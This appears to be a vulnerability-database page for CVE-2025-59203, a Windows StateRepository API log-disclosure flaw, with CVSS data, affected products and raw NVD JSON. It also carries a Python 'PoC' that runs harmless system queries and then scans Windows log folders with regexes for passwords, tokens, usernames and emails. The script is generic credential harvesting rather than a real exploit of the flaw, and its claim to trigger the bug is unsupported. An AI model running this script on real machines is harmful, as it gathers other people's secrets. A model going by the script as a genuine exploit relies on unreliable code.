Security Vulnerability Report
中文
CVE-2025-59203 CVSS 5.5 MEDIUM

CVE-2025-59203

Published: 2025-10-14 17:16:00
Last Modified: 2025-10-17 15:27:12
Source: [email protected]

Description

Insertion of sensitive information into log file in Windows StateRepository API allows an authorized attacker to disclose information locally.

CVSS Details

CVSS Score
5.5
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N

Configurations (Affected Products)

cpe:2.3:o:microsoft:windows_10_1507:*:*:*:*:*:*:x64:* - VULNERABLE
cpe:2.3:o:microsoft:windows_10_1507:*:*:*:*:*:*:x86:* - VULNERABLE
cpe:2.3:o:microsoft:windows_10_1607:*:*:*:*:*:*:x64:* - VULNERABLE
cpe:2.3:o:microsoft:windows_10_1607:*:*:*:*:*:*:x86:* - VULNERABLE
cpe:2.3:o:microsoft:windows_10_1809:*:*:*:*:*:*:x64:* - VULNERABLE
Windows 10 (所有版本)
Windows 11 (所有版本)
Windows Server 2016
Windows Server 2019
Windows Server 2022
Windows Server 2025

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-59203 - Windows StateRepository API Sensitive Information Disclosure PoC # This PoC demonstrates how to trigger sensitive information logging in StateRepository API # and subsequently read the leaked data from log files. import os import subprocess import glob import re # Step 1: Trigger StateRepository API operations that cause sensitive data logging # This can be done by performing operations that invoke the StateRepository API def trigger_state_repository_operations(): """ Trigger StateRepository API operations by performing common Windows tasks that interact with the state repository service. """ # Trigger application state changes (e.g., install/uninstall operations) # Using built-in Windows utilities to invoke StateRepository API try: # Method 1: Trigger via Windows Update or app management subprocess.run(['powershell', '-Command', 'Get-AppxPackage | Select-Object Name, PackageFullName'], capture_output=True, timeout=30) # Method 2: Trigger state changes via registry modifications subprocess.run(['reg', 'query', 'HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Appx'], capture_output=True, timeout=30) # Method 3: Force StateRepository service to log operations subprocess.run(['sc', 'query', 'StateRepository'], capture_output=True, timeout=30) print("[+] StateRepository API operations triggered successfully") return True except Exception as e: print(f"[-] Error triggering operations: {e}") return False def find_state_repository_logs(): """ Search for StateRepository API log files that may contain sensitive information. """ # Common locations for StateRepository logs log_paths = [ os.path.expandvars(r'%ProgramData%\Microsoft\Windows\StateRepository'), os.path.expandvars(r'%ProgramData%\Microsoft\Windows\WER'), os.path.expandvars(r'%LOCALAPPDATA%\Microsoft\Windows\StateRepository'), os.path.expandvars(r'%WINDIR%\Logs'), os.path.expandvars(r'%WINDIR%\System32\winevt\Logs'), os.path.expandvars(r'%ProgramData%\Microsoft\Diagnosis'), ] found_logs = [] for log_path in log_paths: if os.path.exists(log_path): # Search for log files recursively for log_file in glob.glob(os.path.join(log_path, '**', '*.log'), recursive=True): found_logs.append(log_file) for log_file in glob.glob(os.path.join(log_path, '**', '*.xml'), recursive=True): found_logs.append(log_file) for log_file in glob.glob(os.path.join(log_path, '**', '*.etl'), recursive=True): found_logs.append(log_file) print(f"[*] Found {len(found_logs)} potential log files") return found_logs def extract_sensitive_info(log_files): """ Parse log files to extract potentially sensitive information. """ # Patterns that may indicate sensitive information sensitive_patterns = { 'credentials': r'(?i)(password|passwd|pwd|credential|secret|api[_-]?key)\s*[=:]\s*\S+', 'tokens': r'(?i)(token|bearer|jwt|session[_-]?id)\s*[=:]\s*\S+', 'user_info': r'(?i)(user(name)?|email|mail)\s*[=:]\s*\S+', 'paths': r'(?i)(C:\\\\Users\\\\[\w\.]+|/home/[\w\.]+)', 'registry_keys': r'(?i)HK(LM|CU|CR|U|CC)\\\\[\w\\]+', } sensitive_data = {} for log_file in log_files: try: with open(log_file, 'r', errors='ignore') as f: content = f.read() for category, pattern in sensitive_patterns.items(): matches = re.findall(pattern, content) if matches: if category not in sensitive_data: sensitive_data[category] = [] sensitive_data[category].extend(matches[:10]) # Limit results except PermissionError: print(f"[!] Permission denied reading: {log_file}") except Exception as e: print(f"[-] Error reading {log_file}: {e}") return sensitive_data def main(): print("=" * 60) print("CVE-2025-59203 - StateRepository API Info Disclosure PoC") print("=" * 60) # Step 1: Trigger StateRepository operations if trigger_state_repository_operations(): # Step 2: Find log files log_files = find_state_repository_logs() # Step 3: Extract sensitive information if log_files: sensitive_data = extract_sensitive_info(log_files) if sensitive_data: print("\n[!] Sensitive information found in log files:") for category, data in sensitive_data.items(): print(f"\n Category: {category}") for item in data[:5]: print(f" - {item}") else: print("\n[*] No sensitive patterns detected in accessible logs") else: print("\n[-] No log files found in expected locations") print("\n[*] PoC execution complete") if __name__ == '__main__': main()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-59203", "sourceIdentifier": "[email protected]", "published": "2025-10-14T17:16:00.077", "lastModified": "2025-10-17T15:27:12.477", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Insertion of sensitive information into log file in Windows StateRepository API allows an authorized attacker to disclose information locally."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-532"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:microsoft:windows_10_1507:*:*:*:*:*:*:x64:*", "versionEndExcluding": "10.0.10240.21161", "matchCriteriaId": "030F3214-D6AF-40A9-9FC9-523AC9870581"}, {"vulnerable": true, "criteria": "cpe:2.3:o:microsoft:windows_10_1507:*:*:*:*:*:*:x86:*", "versionEndExcluding": "10.0.10240.21161", "matchCriteriaId": "4932CB20-D134-4EDF-8F21-F9D0AF80BFEA"}, {"vulnerable": true, "criteria": "cpe:2.3:o:microsoft:windows_10_1607:*:*:*:*:*:*:x64:*", "versionEndExcluding": "10.0.14393.8519", "matchCriteriaId": "D8145D41-BFB2-47A6-B5E5-1A038A27C1C1"}, {"vulnerable": true, "criteria": "cpe:2.3:o:microsoft:windows_10_1607:*:*:*:*:*:*:x86:*", "versionEndExcluding": "10.0.14393.8519", "matchCriteriaId": "3EE0CDB1-CBF3-45F2-8F0B-96A9D0757B42"}, {"vulnerable": true, "criteria": "cpe:2.3:o:microsoft:windows_10_1809:*:*:*:*:*:*:x64:*", "versionEndExcluding": "10.0.17763.7919", "matchCriteriaId": "E216CD5B-8885-4E17-8718-97E88A724A44"}, {"vulnerable": true, "criteria": "cpe:2.3:o:microsoft:windows_10_1809:*:*:*:*:*:*:x86:*", "versionEndExcluding": "10.0.17763.7919", "matchCriteriaId": "36E44227-0320-43B1-A0D9-EB28B25CDB4D"}, {"vulnerable": true, "criteria": "cpe:2.3:o:microsoft:windows_10_21h2:*:*:*:*:*:*:*:*", "versionEndExcluding": "10.0.19044.6456", "matchCriteriaId": "1485A427-10FF-4C39-9911-4C6F1820BE7F"}, {"vulnerable": true, "criteria": "cpe:2.3:o:microsoft:windows_10_22h2:*:*:*:*:*:*:*:*", "versionEndExcluding": "10.0.19045.6456", "matchCriteriaId": "26CAACAA-3FE8-4740-8CF2-6BF3D069C47F"}, {"vulnerable": true, "criteria": "cpe:2.3:o:microsoft:windows_11_22h2:*:*:*:*:*:*:*:*", "versionEndExcluding": "10.0.22621.6060", "matchCriteriaId": "6F387FA2-66C8-4B70-A537-65806271F16A"}, {"vulnerable": true, "criteria": "cpe:2.3:o:microsoft:windows_11_23h2:*:*:*:*:*:*:*:*", "versionEndIncluding": "10.0.22631.6060", "matchCriteriaId": "4AF873E4-B2FE-4504-BFF0-FC71121FC9A4"}, {"vulnerable": true, "criteria": "cpe:2.3:o:microsoft:windows_11_24h2:*:*:*:*:*:*:*:*", "versionEndExcluding": "10.0.26100.6899", "matchCriteriaId": "41E9F7AC-8E6D-43A0-A157-48A5E0B5BD0D"}, {"vulnerable": true, "criteria": "cpe:2.3:o:microsoft:windows_11_25h2:*:*:*:*:*:*:*:*", "versionEndExcluding": "10.0.26200.6899", "matchCriteriaId": "3B77A066-4F79-4B1F-AECF-58DB4C651EA5"}, {"vulnerable": true, "criteria": "cpe:2.3:o:microsoft:windows_server_2016:*:*:*:*:*:*:*:*", "versionEndIncluding": "10.0.14393.8519", "matchCriteriaId": "860ADFF9-62D0-425B-9310-99ACFC92EB12"}, {"vulnerable": true, "criteria": "cpe:2.3:o:microsoft:windows_server_2019:*:*:*:*:*:*:*:*", "versionEndExcluding": "10.0.17763.7919", "matchCriteriaId": "20810926-AEC9-4C09-9C52-B4B8FADECF3A"}, {"vulnerable": true, "criteria": "cpe:2.3:o:microsoft:windows_server_2022:*:*:*:*:*:*:*:*", "versionEndExcluding": "10.0.20348.4294", "matchCriteriaId": "B1C1EA69-6BB8-4E59-8659-43581FDB48B7"}, {"vulnerable": true, "criteria": "cpe:2.3:o:microsoft:windows_server_2022_23h2:*:*:*:*:*:*:*:*", "versionEndExcluding": "10.0.25398.1913", "matchCriteriaId": "370C12D6-90EF-44BE-8070-AA0080C12600"}, {"vulnerable": true, "criteria": "cpe:2.3:o:microsoft:windows_server_2025:*:*:*:*:*:*:*:*", "versionEndIncluding": "10.0.26100.6899", "matchCriteriaId": "CD6268EB-C42B-406F-B3FF-6E694F93BF41"}]}]}], "references": [{"url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-59203", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.